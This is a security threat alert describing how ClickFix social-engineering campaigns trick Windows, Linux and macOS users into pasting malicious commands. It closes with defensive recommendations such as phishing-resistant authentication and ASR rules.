ClickFix Malware: Campaigns Spread Cross-Platform

A new wave of cyberattacks using the ClickFix social engineering technique is now targeting Linux, expanding from its earlier focus on Windows and macOS. ClickFix deceives users into copying and executing malicious commands under the guise of fixing fake software errors and CAPTCHA tests. It is now used by multiple threat actors to deliver infostealers, remote access trojans, and ransomware.

Threat alert
May 15, 2025

A new wave of cyberattacks using the ClickFix social engineering technique is now targeting Linux, expanding from its earlier focus on Windows and macOS. ClickFix deceives users into copying and executing malicious commands under the guise of fixing fake software errors and CAPTCHA tests. It is now used by multiple threat actors to deliver infostealers, remote access trojans, and ransomware.  

Users are lured through phishing emails, malicious HTML attachments, or malicious JavaScript plugins installed in compromised websites crafted to resemble legitimate services (e.g., Google Meet, Microsoft Word).

Fake error messages prompt users to run malicious commands themselves (e.g., in PowerShell or Linux run dialogs), bypassing traditional security tools. Compromised websites, fake browser update alerts, phishing emails with HTML attachments, and malicious redirects.

Commands are disguised as system fixes or verification steps; when executed, they download and run malware without triggering browser security warnings. Unlike traditional methods, no direct file download is required. This bypasses web protections like Google Safe Browsing, making it harder to detect and stop.

Cross-Platform Campaign

  • Windows: Users are shown fake full-screen warnings. Clicking “Continue” copies a malicious MSHTA command to the clipboard, launching a loader and a decoy PDF.
  • Linux: Victims click a fake CAPTCHA that places a shell command into the clipboard. They’re instructed to run it via ALT+F2, currently leading to a non-malicious script that fetches an image—likely a test by APT36 for future payload delivery.
  • macOS: Past campaigns used fake Google Meet errors to trick users into installing malware.

Recommendations

  • Deploy phishing-resistant authentication methods (such as FIDO2 or certificate-based authentication).
  • Enforce least privilege access (PoLP) to minimize the impact of compromised credentials.
  • Turn on Zero-hour Auto Purge (ZAP) to automatically remove malicious emails already delivered to inboxes.
  • Turn on attack surface reduction (ASR) rules in Microsoft Defender for Endpoint to: block untrusted or unknown executables, prevent execution of obfuscated or potentially malicious scripts, block JavaScript/VBScript from launching downloaded executable content.
  • Apply strict software execution policies: Prevent installation of unauthorized software, especially fake installers posing as updates or fixes.